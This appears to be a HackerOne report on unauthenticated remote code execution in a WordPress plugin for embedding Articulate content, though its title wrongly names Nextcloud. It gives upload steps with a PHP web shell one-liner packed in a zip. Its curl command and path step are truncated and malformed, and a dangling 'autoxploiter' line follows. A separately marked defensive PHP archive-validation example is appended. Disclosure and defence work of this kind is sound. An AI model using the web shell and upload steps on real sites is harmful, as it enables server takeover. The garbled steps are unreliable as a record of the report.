Nextcloud: WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution (UNAUTHORIZED)

ID H1:696198
Type hackerone
Reporter j4tayu
Modified 2019-11-11T15:23:26


Because building the request in Burp Suite is complicated, I only use curl.

  1. Create the files index.html and index.php

     Index.html : <html> Hello world </html>

     Index.php : <?php system($_GET[cmd]); ?>

  2. Once created, compress them into a .zip
  3. Upload with curl: curl -F "name={NAMAFILE}" -F "chunk={RANDOM}" -F "chunks={RANDOM}" -F ""
  4. Here the response reads UPLOAD COMPLETE, which means success. We then try to access <PATH = PATH AT RESULT EX:

For the autoxploiter


Remote code execution
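
The server-side check that would stop the archive described in the steps above, as an added example that is not part of the original report and is not the plugin's own code. The names `ALLOWED_EXT`, `BLOCKED_SEGMENT` and `archive_violations` are hypothetical, and the allowlist is an assumption about what static course content needs.

```php
<?php
// Added example (not the plugin's code): inspect an uploaded archive BEFORE
// extracting it under the web root. Names and the allowlist are assumptions.
const ALLOWED_EXT = ['html', 'htm', 'css', 'js', 'json', 'xml', 'txt',
                     'png', 'jpg', 'jpeg', 'gif', 'mp3', 'mp4', 'woff', 'woff2'];
// Segments a misconfigured server may still hand to an interpreter ("x.php.jpg").
const BLOCKED_SEGMENT = '/^(php\d*|phtml|pht|phar|cgi|pl|py|sh|asp|aspx|jsp)$/';

/** Returns the entry names that must cause the whole upload to be rejected. */
function archive_violations(string $zipPath): array
{
    $zip = new ZipArchive();
    if ($zip->open($zipPath) !== true) {
        return ['<archive could not be opened>'];
    }
    $bad = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $name = (string) $zip->getNameIndex($i);
        // Reject empty names, traversal, absolute paths, backslashes, NUL bytes.
        if ($name === '' || $name[0] === '/' || preg_match('/\.\.|\\\\|\x00/', $name)) {
            $bad[] = $name;
            continue;
        }
        if (substr($name, -1) === '/') {
            continue;                       // directory entry, nothing to execute
        }
        $segments = explode('.', strtolower(basename($name)));
        array_shift($segments);             // drop the part before the first dot
        $ext = end($segments);              // false when the file has no extension
        if (!in_array($ext, ALLOWED_EXT, true) || preg_grep(BLOCKED_SEGMENT, $segments)) {
            $bad[] = $name;
        }
    }
    $zip->close();
    return $bad;
}

// Constructed sample mirroring the report's archive layout; contents are inert.
$tmp = tempnam(sys_get_temp_dir(), 'zipcheck');
$zip = new ZipArchive();
$zip->open($tmp, ZipArchive::CREATE | ZipArchive::OVERWRITE);
$zip->addFromString('index.html', '<html> Hello world </html>');
$zip->addFromString('index.php', 'placeholder');
$zip->addFromString('img/logo.php.jpg', 'placeholder');
$zip->close();
print_r(archive_violations($tmp));
unlink($tmp);
```

Reject the whole upload when the returned list is non-empty rather than extracting the remaining entries. Disabling script execution in the extraction directory is a separate layer that this check does not replace.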